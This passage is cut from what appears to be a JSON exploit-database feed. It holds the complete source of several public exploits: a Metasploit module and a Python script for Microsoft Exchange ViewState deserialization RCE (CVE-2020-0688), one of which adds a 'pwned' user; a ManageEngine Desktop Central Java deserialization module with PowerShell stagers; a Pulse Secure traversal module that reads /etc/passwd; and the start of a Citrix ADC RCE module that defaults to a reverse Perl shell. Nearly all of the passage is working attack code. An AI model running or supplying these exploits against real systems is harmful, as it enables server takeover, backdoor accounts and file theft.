\n'Reliability' => [ REPEATABLE_SESSION, ], \n} \n)) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \n]) \nend \n \ndef check \nstate = get_request_setup \nviewstate = state[:viewstate] \nreturn CheckCode::Unknown if viewstate.nil? \n \nviewstate = Rex::Text.decode_base64(viewstate) \nbody = viewstate[0...-20] \nsignature = viewstate[-20..-1] \n \nunless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature \nreturn CheckCode::Safe \nend \n \n# we've validated the signature matches based on the data we have and thus \n# proven that we are capable of signing a viewstate ourselves \nCheckCode::Vulnerable \nend \n \ndef generate_viewstate(generator, session_id, cmd) \nviewstate = ::Msf::Util::DotNetDeserialization.generate(cmd) \nsignature = generate_viewstate_signature(generator, session_id, viewstate) \nRex::Text.encode_base64(viewstate + signature) \nend \n \ndef generate_viewstate_signature(generator, session_id, viewstate) \nmac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>') \nmac_key_bytes << Rex::Text.to_unicode(session_id) \nOpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes) \nend \n \ndef exploit \nstate = get_request_setup \n \n# the major limit is the max length of a GET request, the command will be \n# XML escaped and then base64 encoded which both increase the size \nif target.arch.first == ARCH_CMD \nexecute_command(payload.encoded, opts={state: state}) \nelse \ncmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first \nexecute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state}) \nend \nend \n \ndef execute_command(cmd, opts) \nstate = opts[:state] \nviewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd) \n5.times do |iteration| \n# this request *must* be a GET request, can't use POST to use a larger viewstate \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => state[:cookies].join(''), \n'agent' => state[:user_agent], \n'vars_get' => { \n'__VIEWSTATE' => viewstate, \n'__VIEWSTATEGENERATOR' => state[:viewstate_generator] \n} \n}) \nbreak \nrescue Rex::ConnectionError, Errno::ECONNRESET => e \nvprint_warning('Encountered a connection error while sending the command, sleeping before retrying') \nsleep iteration \nend \nend \n \ndef get_request_setup \n# need to use a newer default user-agent than what Metasploit currently provides \n# see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string \nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43' \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'), \n'method' => 'POST', \n'agent' => user_agent, \n'vars_post' => { \n'password' => datastore['PASSWORD'], \n'flags' => '4', \n'destination' => full_uri(normalize_uri(target_uri.path, 'owa')), \n'username' => datastore['USERNAME'] \n} \n}) \nfail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil? \ncookies = [res.get_cookies] \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => res.get_cookies, \n'agent' => user_agent \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200 \ncookies << res.get_cookies \n \nviewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0] \nif viewstate_generator.nil? \nprint_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\") \nviewstate_generator = DEFAULT_VIEWSTATE_GENERATOR \nelse \nvprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\") \nend \n \nviewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0] \nif viewstate.nil? \nvprint_warning('Failed to find the __VIEWSTATE value') \nend \n \nsession_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \nif session_id.nil? \nfail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies') \nend \nvprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\") \n \n{user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id} \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156620/exchange_ecp_viewstate.rb.txt"}, {"lastseen": "2020-03-04T15:06:30", "bulletinFamily": "exploit", "description": "", "modified": "2020-03-02T00:00:00", "published": "2020-03-02T00:00:00", "id": "PACKETSTORM:156592", "href": "https://packetstormsecurity.com/files/156592/Microsoft-Exchange-2019-15.2.221.12-Remote-Code-Execution.html", "title": "Microsoft Exchange 2019 15.2.221.12 Remote Code Execution", "type": "packetstorm", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution \n# Date: 2020-02-28 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 \n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys \n# Vendor Homepage: https://www.microsoft.com \n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4 \n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019 \n# CVE: CVE-2020-0688 \n \n#! /usr/bin/env python \n# -*- coding: utf-8 -*- \n''' \n \n \nCopyright 2020 Photubias(c) \n \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2020-0688-Photubias.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nThis is a native implementation without requirements, written in Python 2. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \nReverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net \n \nExample Output: \nCVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\" \n[+] Login worked \n[+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570 \n[+] Detected OWA version number 15.2.221.12 \n[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable! \n[+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]: \n[+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g== \nSending now ... \n''' \nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass \n \n## STATIC STRINGS \n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations) \nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=') \n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability) \nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF') \n \ndef convertInt(iInput, length): \nreturn struct.pack(\"<I\" , int(iInput)).encode('hex')[:length] \n \ndef getYsoserialPayload(sCommand, sSessionId): \n## PART1 of the payload to hash \nstrPart1 = strSerTemplate.replace('###payload###', sCommand) \n## Fix the length fields \n#print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand)) \n#print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand)) \nstrLength1 = convertInt(0x06b8 + len(sCommand),4) \nstrLength2 = convertInt(0x04da + len(sCommand),4) \nstrPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:] \nstrPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:] \n \n## PART2 of the payload to hash \nstrPart2 = '274e7bb9' \nfor v in sSessionId: strPart2 += binascii.hexlify(v)+'00' \nstrPart2 = binascii.unhexlify(strPart2) \n \nstrMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest() \nstrResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac)) \nreturn strResult \n \ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar): \nif not sTarget[-1:] == '/': sTarget += '/' \n## Verify Login \nlPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'} \ntry: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read() \nexcept: print('[!] Error, ' + sTarget + ' not reachable') \nbLoggedIn = False \nfor cookie in oCookjar: \nif cookie.name == 'cadata': bLoggedIn = True \nif not bLoggedIn: \nprint('[-] Login Wrong, too bad') \nexit(1) \nprint('[+] Login worked') \n \n## Verify Session ID \nsSessionId = '' \nsResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read() \nfor cookie in oCookjar: \nif 'SessionId' in cookie.name: sSessionId = cookie.value \nprint('[+] Got ASP.NET Session ID: ' + sSessionId) \n \n## Verify OWA Version \nsVersion = '' \ntry: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2] \nexcept: sVersion = 'favicon' \nif 'favicon' in sVersion: \nprint('[*] Problem, this user has never logged in before (wizard detected)') \nprint(' Please log in manually first at ' + sTarget + 'ecp/default.aspx') \nexit(1) \nprint('[+] Detected OWA version number '+sVersion) \n \n## Verify ViewStateValue \nsViewState = '' \ntry: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0] \nexcept: pass \nif sViewState == 'B97B4E27': \nprint('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!') \nelse: \nprint('[-] Error, viewstate wrong or not correctly parsed: '+sViewState) \nans = raw_input('[?] Still want to try the exploit? [y/N]: ') \nif ans == '' or ans.lower() == 'n': exit(1) \nreturn sSessionId, sTarget, sViewState \n \ndef main(): \nparser = argparse.ArgumentParser() \nparser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='') \nparser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='') \nparser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='') \nparser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='') \nargs = parser.parse_args() \nif args.target == '' or args.username == '' or args.command == '': \nprint('[!] Example usage: ') \nprint(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"') \nelse: \nif args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ') \nelse: sPassword = args.password \nctx = ssl.create_default_context() \nctx.check_hostname = False \nctx.verify_mode = ssl.CERT_NONE \noCookjar = cookielib.CookieJar() \n#oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}) \n#oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy) \noOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar)) \nsSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar) \nans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ') \nif ans.lower() == 'n': exit(0) \nsPayLoad = getYsoserialPayload(args.command, sSessionId) \nprint('[+] Got Payload: ' + sPayLoad) \nsURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad) \nprint(' Sending now ...') \ntry: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'})) \nexcept urllib2.HTTPError, e: \nif e.code == '500': print('[+] This probably worked (Error Code 500 received)') \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156592/msexchange2019-exec.txt"}], "zdt": [{"lastseen": "2020-03-15T15:06:50", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.", "modified": "2020-03-15T00:00:00", "published": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\r\n 'Description' => %q{\r\n This module exploits a Java deserialization vulnerability in the\r\n getChartImage() method from the FileStorage class within ManageEngine\r\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\r\n\r\n \"The short-term fix for the arbitrary file upload vulnerability was\r\n released in build 10.0.474 on January 20, 2020. In continuation of that,\r\n the complete fix for the remote code execution vulnerability is now\r\n available in build 10.0.479.\"\r\n },\r\n 'Author' => [\r\n 'mr_me', # Discovery and exploit\r\n 'wvu' # Module\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-10189'],\r\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\r\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\r\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\r\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\r\n ],\r\n 'DisclosureDate' => '2020-03-05', # 0day release\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'windows',\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n ['Windows Command',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :win_cmd\r\n ],\r\n ['Windows Dropper',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :win_dropper\r\n ],\r\n ['PowerShell Stager',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :psh_stager\r\n ]\r\n ],\r\n 'DefaultTarget' => 2,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 8383,\r\n 'SSL' => true,\r\n 'WfsDelay' => 60 # It can take a little while to trigger\r\n },\r\n 'CmdStagerFlavor' => 'certutil', # This works without issue\r\n 'Notes' => {\r\n 'PatchedVersion' => Gem::Version.new('100474'),\r\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\r\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\r\n )\r\n\r\n unless res\r\n return CheckCode::Unknown('Target is not responding to check')\r\n end\r\n\r\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\r\n return CheckCode::Unknown('Target is not running Desktop Central')\r\n end\r\n\r\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\r\n\r\n unless version\r\n return CheckCode::Detected('Could not detect Desktop Central version')\r\n end\r\n\r\n vprint_status(\"Detected Desktop Central version #{version}\")\r\n\r\n if Gem::Version.new(version) < notes['PatchedVersion']\r\n return CheckCode::Appears(\"#{version} is an exploitable version\")\r\n end\r\n\r\n CheckCode::Safe(\"#{version} is not an exploitable version\")\r\n end\r\n\r\n def exploit\r\n # NOTE: Automatic check is implemented by the AutoCheck mixin\r\n super\r\n\r\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\r\n\r\n case target['Type']\r\n when :win_cmd\r\n execute_command(payload.encoded)\r\n when :win_dropper\r\n execute_cmdstager\r\n when :psh_stager\r\n execute_command(cmd_psh_payload(\r\n payload.encoded,\r\n payload.arch.first,\r\n remove_comspec: true\r\n ))\r\n end\r\n end\r\n\r\n def execute_command(cmd, _opts = {})\r\n # XXX: An executable is required to run arbitrary commands\r\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\r\n\r\n vprint_status(\"Serializing command: #{cmd}\")\r\n\r\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\r\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\r\n 'CommonsBeanutils1',\r\n cmd\r\n )\r\n\r\n # XXX: Patch in expected serialVersionUID\r\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\r\n\r\n # Rock 'n' roll!\r\n upload_serialized_payload(serialized_payload)\r\n deserialize_payload\r\n end\r\n\r\n def upload_serialized_payload(serialized_payload)\r\n print_status('Uploading serialized payload')\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,\r\n '/mdm/client/v1/mdmLogUploader'),\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\r\n 'filename' => 'logger.zip'\r\n },\r\n 'data' => serialized_payload\r\n )\r\n\r\n unless res && res.code == 200\r\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\r\n end\r\n\r\n print_good('Successfully uploaded serialized payload')\r\n\r\n # C:\\Program Files\\DesktopCentral_Server\\bin\r\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\r\n end\r\n\r\n def deserialize_payload\r\n print_status('Deserializing payload')\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\r\n 'vars_get' => {'img' => '\\\\logger.zip'}\r\n )\r\n\r\n unless res && res.code == 200\r\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\r\n end\r\n\r\n print_good('Successfully deserialized payload')\r\n end\r\n\r\nend\n\n# 0day.today [2020-03-15] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34095"}, {"lastseen": "2019-12-04T20:01:09", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2019-08-21T00:00:00", "published": "2019-08-21T00:00:00", "id": "1337DAY-ID-33140", "href": "https://0day.today/exploit/description/33140", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure Exploit", "type": "zdt", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33140"}, {"lastseen": "2020-01-19T23:04:26", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2020-01-13T00:00:00", "published": "2020-01-13T00:00:00", "id": "1337DAY-ID-33806", "href": "https://0day.today/exploit/description/33806", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC Remote Code Execution',\r\n 'Description' => %q(\r\n An issue was discovered in Citrix Application Delivery Controller (ADC)\r\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\r\n ),\r\n 'Author' => [\r\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-19781'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\r\n ['EDB', '47901'],\r\n ['EDB', '47902']\r\n ],\r\n 'DisclosureDate' => '2019-12-17',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl meterpreter'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Unix (remote shell)',\r\n 'Type' => :cmd_shell,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (command-line)',\r\n 'Type' => :cmd_generic,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 